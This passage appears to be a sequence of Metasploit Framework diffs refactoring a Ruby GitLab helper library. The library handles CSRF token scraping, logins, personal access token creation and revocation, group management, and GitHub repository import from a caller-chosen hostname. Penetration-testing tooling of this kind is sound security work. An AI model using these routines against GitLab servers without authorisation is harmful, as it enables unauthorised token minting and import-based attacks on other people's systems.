       'ctype' => 'application/json',
       'headers' => {
-        'PRIVATE-TOKEN' => api_token
+        'PRIVATE-TOKEN' => personal_access_token
       }
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, 'Failed to revoke access token' unless res&.code == 204
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to revoke access token.  Unexpected HTTP #{res.code} response." unless res.code == 204
 
     nil
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/access_tokens.rb
@@ -1,0 +1,58 @@
+# -*- coding: binary -*-
+
+# GitLab Access Tokens mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::AccessTokens
+  # Create Gitlab access access token
+  #
+  # @return [String,nil] Gitlab personal access token if created, nil otherwise
+  def gitlab_create_access_token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/-/profile/personal_access_tokens',
+      'keep_cookies' => true,
+      'vars_post' => {
+        'personal_access_token[name]' => Rex::Text.rand_text_alphanumeric(8),
+        'personal_access_token[expires_at]' => '',
+        'personal_access_token[scopes][]' => 'api',
+        'commit' => 'Create personal access token'
+      },
+      'headers' => {
+        'X-CSRF-Token' => gitlab_helper_extract_csrf_token(path: '/-/profile/personal_access_tokens', regex: /name="csrf-token" content="(.*)"/)
+      }
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 200
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    token = JSON.parse(res.body)['new_token']
+
+    return token if token
+
+    nil
+  end
+
+  # Revoke Gitlab personal access token
+  #
+  # @return [nil,GitLabClientException] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException otherwise
+  def gitlab_revoke_access_token(api_token)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => '/api/v4/personal_access_tokens/self',
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      }
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 204
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/authenticate.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/authenticate.rb
@@ -1,0 +1,5 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Authenticate
+  include Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/error.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/error.rb
@@ -15,8 +15,8 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Error
 
   # Csrf token error
   class CsrfError < ClientError
-    def initialize
-      super(message: 'Could not successfully extract CSRF token')
+    def initialize(message = 'Could not successfully extract CSRF token')
+      super(message: message)
     end
   end
 

--- a/lib/msf/core/exploit/remote/http/gitlab/error.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/error.rb
@@ -1,0 +1,37 @@
+module Msf::Exploit::Remote::HTTP::Gitlab::Error
+  class ClientError < ::StandardError
+    def initialize(message: nil)
+      super(message || 'Gitlab Client Error')
+    end
+  end
+
+  class AuthenticationError < ClientError
+    def initialize
+      super(message: 'Authentication failed')
+    end
+  end
+
+  class CsrfError < ClientError
+    def initialize
+      super(message: 'Could not successfully extract CSRF token')
+    end
+  end
+
+  class GroupError < ClientError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class ImportError < ClientError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class VersionError < ClientError
+    def initialize
+      super(message: 'Unable to determine Gitlab version')
+    end
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/error.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/error.rb
@@ -1,34 +1,40 @@
 module Msf::Exploit::Remote::HTTP::Gitlab::Error
+  # GitLab error mixin
   class ClientError < ::StandardError
     def initialize(message: nil)
       super(message || 'Gitlab Client Error')
     end
   end
 
+  # Authentication error
   class AuthenticationError < ClientError
     def initialize
       super(message: 'Authentication failed')
     end
   end
 
+  # Csrf token error
   class CsrfError < ClientError
     def initialize
       super(message: 'Could not successfully extract CSRF token')
     end
   end
 
+  # Group error
   class GroupError < ClientError
     def initialize(message)
       super(message: message)
     end
   end
 
+  # Import error
   class ImportError < ClientError
     def initialize(message)
       super(message: message)
     end
   end
 
+  # Version error
   class VersionError < ClientError
     def initialize
       super(message: 'Unable to determine Gitlab version')

--- a/lib/msf/core/exploit/remote/http/gitlab/form.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/form.rb
@@ -1,0 +1,2 @@
+module Msf::Exploit::Remote::HTTP::Gitlab::Form
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/form/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/form/access_tokens.rb
@@ -5,7 +5,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Form::AccessTokens
   # Create Gitlab access access token
   #
   # @return [String,nil] Gitlab personal access token if created, nil otherwise
-  def create_personal_access_token
+  def gitlab_create_personal_access_token
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/-/profile/personal_access_tokens'),

--- a/lib/msf/core/exploit/remote/http/gitlab/form/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/form/access_tokens.rb
@@ -1,0 +1,34 @@
+# -*- coding: binary -*-
+
+# Create a Gitlab Access Token via form
+module Msf::Exploit::Remote::HTTP::Gitlab::Form::AccessTokens
+  # Create Gitlab access access token
+  #
+  # @return [String,nil] Gitlab personal access token if created, nil otherwise
+  def create_personal_access_token
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/-/profile/personal_access_tokens'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'personal_access_token[name]' => Rex::Text.rand_text_alphanumeric(8),
+        'personal_access_token[expires_at]' => '',
+        'personal_access_token[scopes][]' => 'api',
+        'commit' => 'Create personal access token'
+      },
+      'headers' => {
+        'X-CSRF-Token' => gitlab_helper_extract_csrf_token(path: '/-/profile/personal_access_tokens', regex: /name="csrf-token" content="(.*)"/)
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to create access token. Unexpected HTTP #{res.code} response." unless res.code == 200
+
+    token = JSON.parse(res.body)['new_token']
+
+    return token if token
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/form/authenticate.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/form/authenticate.rb
@@ -1,14 +1,14 @@
 # -*- coding: binary -*-
 
 # GitLab session mixin
-module Msf::Exploit::Remote::HTTP::Gitlab::Signin
+module Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
   # performs a gitlab login
   #
   # @param user [String] Username
   # @param pass [String] Password
   # @param timeout [Integer] The maximum number of seconds to wait before the request times out
   # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
-  def gitlab_sign_in(username, password)
+  def sign_in(username, password)
     sign_in_path = '/users/sign_in'
     csrf_token = gitlab_helper_extract_csrf_token(
       path: sign_in_path,
@@ -36,8 +36,8 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Signin
 
   # performs a gitlab logout
   #
-  # @return [Bolean,GitLabError] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::Error otherwise
-  def gitlab_sign_out
+  # @return [Boolean,GitLabError] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::Error otherwise
+  def sign_out
     csrf_token = gitlab_helper_extract_csrf_token(
       path: '/',
       regex: /name="csrf-token" content="(.*)"/

--- a/lib/msf/core/exploit/remote/http/gitlab/form/authenticate.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/form/authenticate.rb
@@ -8,7 +8,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
   # @param pass [String] Password
   # @param timeout [Integer] The maximum number of seconds to wait before the request times out
   # @return [String,nil] the session cookies as a single string on successful login, nil otherwise
-  def sign_in(username, password)
+  def gitlab_sign_in(username, password)
     sign_in_path = '/users/sign_in'
     csrf_token = gitlab_helper_extract_csrf_token(
       path: sign_in_path,
@@ -37,7 +37,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Form::Authenticate
   # performs a gitlab logout
   #
   # @return [Boolean,GitLabError] True if sign out, Msf::Exploit::Remote::HTTP::Gitlab::Error otherwise
-  def sign_out
+  def gitlab_sign_out
     csrf_token = gitlab_helper_extract_csrf_token(
       path: '/',
       regex: /name="csrf-token" content="(.*)"/

--- a/lib/msf/core/exploit/remote/http/gitlab/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/groups.rb
@@ -18,11 +18,13 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Groups
       }.to_json
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, 'Unable to create group' if res&.code != 201
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
 
-    group_id = JSON.parse(res.body)['id']
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to create group. Unexpected HTTP #{res.code} response." if res.code != 201
 
-    return group_id if group_id
+    group = JSON.parse(res.body)
+
+    return group if group
 
     nil
   end
@@ -40,7 +42,9 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Groups
       }
     })
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, 'Unable to delete group' if res&.code != 202
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to delete group. Unexpected HTTP #{res.code} response." if res.code != 202
 
     true
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/groups.rb
@@ -2,50 +2,5 @@
 
 # GitLab Groups mixin
 module Msf::Exploit::Remote::HTTP::Gitlab::Groups
-  # Create a new group
-  #
-  # @return [String,nil] Group ID if successful create, nil otherwise
-  def gitlab_create_group(group_name, api_token)
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/api/v4/groups'),
-      'ctype' => 'application/json',
-      'headers' => {
-        'PRIVATE-TOKEN' => api_token
-      },
-      'data' => {
-        name: group_name, path: group_name, visibility: 'public'
-      }.to_json
-    })
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to create group. Unexpected HTTP #{res.code} response." if res.code != 201
-
-    group = JSON.parse(res.body)
-
-    return group if group
-
-    nil
-  end
-
-  # Delete a group
-  #
-  # @return [Bolean,GitLabClientError] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
-  def gitlab_delete_group(group_id, api_token)
-    res = send_request_cgi({
-      'method' => 'DELETE',
-      'uri' => normalize_uri('/api/v4/groups', group_id),
-      'ctype' => 'application/json',
-      'headers' => {
-        'PRIVATE-TOKEN' => api_token
-      }
-    })
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, "Unable to delete group. Unexpected HTTP #{res.code} response." if res.code != 202
-
-    true
-  end
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Groups
 end

--- a/lib/msf/core/exploit/remote/http/gitlab/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/groups.rb
@@ -1,0 +1,55 @@
+# -*- coding: binary -*-
+
+# GitLab Groups mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Groups
+  # Create a new group
+  #
+  # @return [String,nil] Group ID if successful create, nil otherwise
+  def gitlab_create_group(group_name, api_token)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/api/v4/groups',
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      },
+      'data' => {
+        name: group_name, path: group_name, visibility: 'public'
+      }.to_json
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 201
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    group_id = JSON.parse(res.body)['id']
+
+    return group_id if group_id
+
+    nil
+  end
+
+  # Delete a group
+  #
+  # @return [Bolean,GitLabClientException] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException otherwise
+  def gitlab_delete_group(group_id, api_token)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri('/api/v4/groups', group_id),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      }
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 202
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    true
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/groups.rb
@@ -18,11 +18,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Groups
       }.to_json
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 201
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, 'Unable to create group' if res&.code != 201
 
     group_id = JSON.parse(res.body)['id']
 
@@ -33,7 +29,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Groups
 
   # Delete a group
   #
-  # @return [Bolean,GitLabClientException] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException otherwise
+  # @return [Bolean,GitLabClientError] True if successful deleted, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
   def gitlab_delete_group(group_id, api_token)
     res = send_request_cgi({
       'method' => 'DELETE',
@@ -44,11 +40,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Groups
       }
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 202
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::GroupError, 'Unable to delete group' if res&.code != 202
 
     true
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/groups.rb
@@ -8,7 +8,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Groups
   def gitlab_create_group(group_name, api_token)
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => '/api/v4/groups',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/groups'),
       'ctype' => 'application/json',
       'headers' => {
         'PRIVATE-TOKEN' => api_token

--- a/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
@@ -30,11 +30,13 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Helpers
       'keep_cookies' => true
     })
 
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' if res.nil?
+
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError unless res&.code == 200
 
     token = res.body[regex, 1]
 
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError if token.nil?
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError, "Could not successfully extract CSRF token using the regex #{regex}" if token.nil?
 
     token
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
@@ -30,17 +30,12 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Helpers
       'keep_cookies' => true
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 200
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError unless res&.code == 200
 
     token = res.body[regex, 1]
-    if token.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Could not successfully extract CSRF token'
-    end
-
+    
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError if token.nil?
+    
     token
   end
 end

--- a/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
@@ -26,16 +26,16 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Helpers
   def gitlab_helper_extract_csrf_token(path:, regex:)
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => path,
+      'uri' => normalize_uri(target_uri.path, path),
       'keep_cookies' => true
     })
 
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError unless res&.code == 200
 
     token = res.body[regex, 1]
-    
+
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::CsrfError if token.nil?
-    
+
     token
   end
 end

--- a/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/helpers.rb
@@ -1,0 +1,46 @@
+# -*- coding: binary -*-
+
+# GitLab helpers mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Helpers
+  # Helper methods are private and should not be called by modules
+
+  private
+
+  # Returns the POST data for a Gitlab login request
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param csrf_token [String] CSRF token
+  # @return [Hash] The post data for vars_post Parameter
+  def gitlab_helper_login_post_data(user, pass, csrf_token)
+    post_data = {
+      'utf8' => '✓',
+      'authenticity_token' => csrf_token,
+      'user[login]' => user,
+      'user[password]' => pass,
+      'user[remember_me]' => 0
+    }
+    post_data
+  end
+
+  def gitlab_helper_extract_csrf_token(path:, regex:)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => path,
+      'keep_cookies' => true
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 200
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    token = res.body[regex, 1]
+    if token.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Could not successfully extract CSRF token'
+    end
+
+    token
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -2,45 +2,5 @@
 
 # GitLab import mixin
 module Msf::Exploit::Remote::HTTP::Gitlab::Import
-  # Import a repository from a remote URL
-  #
-  # @return [String,nil] Import ID if successfully enqueued, nil otherwise
-  def gitlab_import_github_repo(group_name:, github_hostname:, api_token:)
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/api/v4/import/github'),
-      'ctype' => 'application/json',
-      'headers' => {
-        'PRIVATE-TOKEN' => api_token
-      },
-      'data' => {
-        'personal_access_token' => Rex::Text.rand_text_alphanumeric(8),
-        'repo_id' => rand(1000),
-        'target_namespace' => group_name,
-        'new_name' => "gh-import-#{rand(1000)}",
-        'github_hostname' => github_hostname
-      }.to_json
-    })
-
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
-
-    # 422 is returned if the import failed, but the response body contains the error message
-    if res.code == 422
-      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
-    end
-
-    # 201 is returned if the import was successfully enqueued
-    unless res.code == 201
-      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
-    end
-
-    # Example of a successful response body
-    # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}
-
-    body = res.get_json_document
-
-    return body if body
-
-    nil
-  end
+  include Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::Import
 end

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -22,11 +22,10 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
       }.to_json
     })
 
-    if res.nil? || res.body.nil?
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
-    elsif res.code != 201
-      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
-    end
+    # 422 is returned if the import failed, but the response body contains the error message
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, JSON.parse(res.body)['errors'] if res&.code == 422
+    # 201 is returned if the import was successfully enqueued
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res&.code == 201
 
     id = JSON.parse(res.body)['id']
 

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -25,14 +25,14 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
 
     # 422 is returned if the import failed, but the response body contains the error message
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, JSON.parse(res.body)['errors'] if res.code == 422
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, res.get_json_document['errors'] if res.code == 422
     # 201 is returned if the import was successfully enqueued
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res.code == 201
 
-    # Example of a successful reposnse body
+    # Example of a successful response body
     # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}
 
-    body = JSON.parse(res.body)
+    body = res.get_json_document
 
     return body if body
 

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -8,7 +8,7 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
   def gitlab_import_github_repo(group_name, github_hostname, api_token)
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => '/api/v4/import/github',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/import/github'),
       'ctype' => 'application/json',
       'headers' => {
         'PRIVATE-TOKEN' => api_token

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -4,8 +4,8 @@
 module Msf::Exploit::Remote::HTTP::Gitlab::Import
   # Import a repository from a remote URL
   #
-  # @return [String,nil] Import ID if succefull enqueue, nil otherwise
-  def gitlab_import_github_repo(group_name, github_hostname, api_token)
+  # @return [String,nil] Import ID if successfully enqueued, nil otherwise
+  def gitlab_import_github_repo(group_name:, github_hostname:, api_token:)
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/api/v4/import/github'),

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -1,0 +1,37 @@
+# -*- coding: binary -*-
+
+# GitLab import mixin
+module Msf::Exploit::Remote::HTTP::Gitlab::Import
+  # Import a repository from a remote URL
+  #
+  # @return [String,nil] Import ID if succefull enqueue, nil otherwise
+  def gitlab_import_github_repo(group_name, github_hostname, api_token)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/api/v4/import/github',
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => api_token
+      },
+      'data' => {
+        'personal_access_token' => Rex::Text.rand_text_alphanumeric(8),
+        'repo_id' => rand(1000),
+        'target_namespace' => group_name,
+        'new_name' => "gh-import-#{rand(1000)}",
+        'github_hostname' => github_hostname
+      }.to_json
+    })
+
+    if res.nil? || res.body.nil?
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, 'Empty response. Please validate RHOST'
+    elsif res.code != 201
+      raise Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientException, "#{__method__} Unexpected HTTP #{res.code} response."
+    end
+
+    id = JSON.parse(res.body)['id']
+
+    return id if id
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -22,14 +22,19 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
       }.to_json
     })
 
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
     # 422 is returned if the import failed, but the response body contains the error message
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, JSON.parse(res.body)['errors'] if res&.code == 422
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, JSON.parse(res.body)['errors'] if res.code == 422
     # 201 is returned if the import was successfully enqueued
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res&.code == 201
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res.code == 201
 
-    id = JSON.parse(res.body)['id']
+    # Example of a successful reposnse body
+    # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}
 
-    return id if id
+    body = JSON.parse(res.body)
+
+    return body if body
 
     nil
   end

--- a/lib/msf/core/exploit/remote/http/gitlab/import.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/import.rb
@@ -25,9 +25,14 @@ module Msf::Exploit::Remote::HTTP::Gitlab::Import
     raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
 
     # 422 is returned if the import failed, but the response body contains the error message
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, res.get_json_document['errors'] if res.code == 422
+    if res.code == 422
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
+
     # 201 is returned if the import was successfully enqueued
-    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, 'Import failed' unless res.code == 201
+    unless res.code == 201
+      raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ImportError, ((res.get_json_document || {})['errors'] || 'Import failed')
+    end
 
     # Example of a successful response body
     # {"id":54,"name":"gh-import-761","full_path":"/fpXxUqzfQY/gh-import-761","full_name":"fpXxUqzfQY / gh-import-761"}

--- a/lib/msf/core/exploit/remote/http/gitlab/rest.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest.rb
@@ -1,0 +1,4 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4.rb
@@ -1,0 +1,2 @@
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4/access_tokens.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4/access_tokens.rb
@@ -1,0 +1,23 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitlab::Rest::V4::AccessTokens
+  # Revoke a Gitlab access token via the v4 REST api
+  #
+  # @return [nil,GitLabClientError] nil if revoke, Msf::Exploit::Remote::HTTP::Gitlab::GitLabClientError otherwise
+  def gitlab_revoke_personal_access_token(personal_access_token)
+    res = send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, '/api/v4/personal_access_tokens/self'),
+      'ctype' => 'application/json',
+      'headers' => {
+        'PRIVATE-TOKEN' => personal_access_token
+      }
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError.new message: 'Request timed out' unless res
+
+    raise Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError, "Failed to revoke access token.  Unexpected HTTP #{res.code} response." unless res.code == 204
+
+    nil
+  end
+end

--- a/lib/msf/core/exploit/remote/http/gitlab/rest/v4/groups.rb
+++ b/lib/msf/core/exploit/remote/http/gitlab/rest/v4/groups.rb
